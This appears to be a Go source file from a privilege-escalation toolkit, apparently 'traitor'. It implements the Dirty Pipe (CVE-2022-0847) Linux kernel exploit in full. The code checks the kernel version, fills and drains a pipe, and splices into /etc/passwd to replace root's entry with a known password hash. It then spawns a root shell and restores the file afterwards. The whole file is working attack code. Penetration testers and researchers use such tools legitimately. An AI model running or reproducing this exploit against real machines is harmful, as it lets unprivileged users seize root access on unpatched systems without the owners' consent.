package cve20220847

import (
	"context"
	"errors"
	"fmt"
	"os"
	"regexp"
	"strconv"
	"strings"
	"syscall"

	"github.com/liamg/traitor/pkg/logger"
	"github.com/liamg/traitor/pkg/payloads"
	"github.com/liamg/traitor/pkg/shell"
	"github.com/liamg/traitor/pkg/state"
	"golang.org/x/sys/unix"
)

// cve20220847Exploit implements the Dirty Pipe (CVE-2022-0847) privilege
// escalation.
//
// see: https://dirtypipe.cm4all.com/
type cve20220847Exploit struct {
	// log receives progress messages from the helper methods; it is
	// assigned at the start of Exploit.
	log logger.Logger
	// pageSize is the page size in bytes used for the page-boundary check
	// in writeToFile and as the chunk size when filling and draining the
	// pipe.
	pageSize int64
}

// New returns an exploit instance configured with a 4096-byte page size.
func New() *cve20220847Exploit {
	return &cve20220847Exploit{pageSize: 4096}
}

// IsVulnerable reports whether the kernel version recorded in s falls inside
// the range affected by CVE-2022-0847.
//
// The first dotted numeric sequence found in s.KernelVersion is parsed into
// major, minor and patch components. Versions with fewer than three numeric
// components, or with a component that cannot be parsed as an int, are
// reported as not vulnerable. When the version is considered vulnerable a
// message is written to log.
func (v *cve20220847Exploit) IsVulnerable(ctx context.Context, s *state.State, log logger.Logger) bool {

	r := regexp.MustCompile(`[0-9]+\.[0-9]+(\.[0-9]+)*`)
	ver := r.FindString(s.KernelVersion)

	var segments []int
	for _, str := range strings.Split(ver, ".") {
		n, err := strconv.Atoi(str)
		if err != nil {
			// Also covers the "no match" case, where ver is empty.
			return false
		}
		segments = append(segments, n)
	}

	if len(segments) < 3 {
		return false
	}

	major, minor, patch := segments[0], segments[1], segments[2]

	// affects Linux Kernel 5.8 and later versions, and has been fixed in Linux 5.16.11, 5.15.25 and 5.10.102
	switch {
	case major != 5:
		// Every affected release is a 5.x kernel. Rejecting only major > 5
		// would let older kernels (e.g. 4.15.0) fall through as vulnerable.
		return false
	case minor < 8:
		return false
	case minor > 16:
		return false
	case minor == 16 && patch >= 11:
		return false
	case minor == 15 && patch >= 25:
		return false
	case minor == 10 && patch >= 102:
		return false
	}

	log.Printf("Kernel version %s is vulnerable!", ver)
	return true
}

// Shell runs the exploit with the default payload and returns whatever
// Exploit returns.
func (v *cve20220847Exploit) Shell(ctx context.Context, s *state.State, log logger.Logger) error {
	var payload payloads.Payload = payloads.Default
	return v.Exploit(ctx, s, log, payload)
}

// Exploit overwrites the root entry at the start of /etc/passwd with a known
// password hash, starts a root shell using that password, and restores the
// saved contents of /etc/passwd when the shell returns.
//
// It returns an error if /etc/passwd cannot be read, does not begin with
// "root", or cannot be overwritten; otherwise it returns the result of the
// shell invocation. A failure to restore the file is logged rather than
// returned.
func (v *cve20220847Exploit) Exploit(ctx context.Context, s *state.State, log logger.Logger, payload payloads.Payload) error {

	// The helper methods log through v.log.
	v.log = log

	log.Printf("Attempting to set root password...")
	passwdData, err := os.ReadFile("/etc/passwd")
	if err != nil {
		return err
	}

	// Keep at most 4095 bytes so that restoring from offset 1 stays within
	// the first 4096 bytes of the file.
	backup := string(passwdData)
	if len(backup) > 4095 {
		backup = backup[:4095]
	}

	// HasPrefix is safe for files shorter than four bytes, where slicing
	// passwdData[:4] would panic.
	if !strings.HasPrefix(backup, "root") {
		return fmt.Errorf("unexpected data in /etc/passwd")
	}

	// The leading "root" is already in place, so only the remainder of the
	// line is written, starting at offset 4 (writeToFile rejects offset 0).
	rootLine := "root:$1$traitor$ELjiH/IyoHuVv5Hxiqam21:0:0::/root:/bin/sh\n"
	if err := v.writeToFile("/etc/passwd", 4, []byte(rootLine[4:])); err != nil {
		return fmt.Errorf("failed to overwrite target file: %w", err)
	}

	defer func() {
		log.Printf("Restoring contents of /etc/passwd...")
		// The first byte is never modified, so the restore starts at offset 1.
		if err := v.writeToFile("/etc/passwd", 1, []byte(backup)[1:]); err != nil {
			log.Printf("Failed to restore /etc/passwd: %s", err)
		}
	}()

	log.Printf("Starting shell...")
	log.Printf("Please exit the shell once you are finished to ensure the contents of /etc/passwd is restored.")
	return shell.WithPassword("root", "traitor", log)
}

// writeToFile overwrites the cached contents of the file at path, starting at
// offset, with data. The file is only opened for reading.
//
// It splices the single byte preceding offset from the file into a pipe
// prepared by dirtyThatPipe and then writes data into that pipe.
//
// offset must not be a multiple of the page size, and offset plus len(data)
// must not extend past the end of the page containing offset; both cases are
// rejected with an error before the file is opened. Errors from opening the
// file, preparing the pipe, splicing, or writing are returned wrapped.
func (v *cve20220847Exploit) writeToFile(path string, offset int64, data []byte) error {

	pageOffset := offset % v.pageSize
	if pageOffset == 0 {
		return errors.New("cannot write to an offset aligned with a page boundary")
	}
	// Bytes past the end of the page would not reach the file, yet the pipe
	// write would still report success, so refuse such requests.
	if pageOffset+int64(len(data)) > v.pageSize {
		return errors.New("cannot write across a page boundary")
	}

	v.log.Printf("Opening '%s' for read...", path)
	target, err := os.Open(path)
	if err != nil {
		return fmt.Errorf("failed to read target file: %w", err)
	}
	// Close the descriptor on every path; this also keeps target reachable
	// while its raw fd is in use by splice below.
	defer func() {
		// Best-effort: nothing useful can be done if closing a read-only
		// handle fails.
		_ = target.Close()
	}()

	r, w, err := v.dirtyThatPipe()
	if err != nil {
		return fmt.Errorf("failed to create dirty pipe: %w", err)
	}
	defer func() {
		// Best-effort cleanup of both pipe ends.
		_ = r.Close()
		_ = w.Close()
	}()

	v.log.Printf("Splicing data...")
	// Splice one byte from just before the requested offset so that the
	// following pipe write begins exactly at offset.
	offset--
	spliced, err := syscall.Splice(int(target.Fd()), &offset, int(w.Fd()), nil, 1, 0)
	if err != nil {
		return fmt.Errorf("splice error: %w", err)
	}
	if spliced <= 0 {
		return fmt.Errorf("splice failed (%d)", spliced)
	}

	v.log.Printf("Writing to dirty pipe...")
	n, err := w.Write(data)
	if err != nil {
		return fmt.Errorf("write failed: %w", err)
	}
	if n < len(data) {
		return fmt.Errorf("write partially failed - %d bytes written", n)
	}

	v.log.Printf("Write of '%s' successful!", path)
	return nil
}

// dirtyThatPipe creates a pipe, fills it completely with zero bytes and then
// drains it again, returning the read and write ends.
//
// The pipe capacity is queried with F_GETPIPE_SZ, and the fill and drain are
// performed in chunks of at most v.pageSize bytes. On success the caller owns
// both returned files and must close them. On any failure both ends are
// closed here and nil files are returned with the error.
func (v *cve20220847Exploit) dirtyThatPipe() (r *os.File, w *os.File, err error) {

	v.log.Printf("Creating pipe...")
	pr, pw, err := os.Pipe()
	if err != nil {
		return nil, nil, fmt.Errorf("create failed: %w", err)
	}
	// Error returns below hand back nil files, so the caller cannot close
	// the pipe; release both ends here whenever an error is returned.
	defer func() {
		if err != nil {
			// Best-effort cleanup; the original error is what matters.
			_ = pr.Close()
			_ = pw.Close()
		}
	}()

	v.log.Printf("Determining pipe size...")
	size, err := unix.FcntlInt(pw.Fd(), syscall.F_GETPIPE_SZ, -1)
	if err != nil {
		return nil, nil, fmt.Errorf("fcntl error: %w", err)
	}
	v.log.Printf("Pipe size is %d.", size)

	// One page-sized scratch buffer serves both loops. It is all zeros for
	// the whole fill phase, because reads only start after the fill is done.
	buf := make([]byte, v.pageSize)

	v.log.Printf("Filling pipe...")
	written := 0
	for written < size {
		chunk := buf
		if remaining := size - written; remaining < len(chunk) {
			chunk = chunk[:remaining]
		}
		n, werr := pw.Write(chunk)
		if werr != nil {
			return nil, nil, fmt.Errorf("pipe write failed: %w", werr)
		}
		written += n
	}

	v.log.Printf("Draining pipe...")
	read := 0
	for read < size {
		chunk := buf
		if remaining := size - read; remaining < len(chunk) {
			chunk = chunk[:remaining]
		}
		n, rerr := pr.Read(chunk)
		if rerr != nil {
			return nil, nil, fmt.Errorf("pipe read failed: %w", rerr)
		}
		read += n
	}

	v.log.Printf("Pipe drained.")
	return pr, pw, nil
}
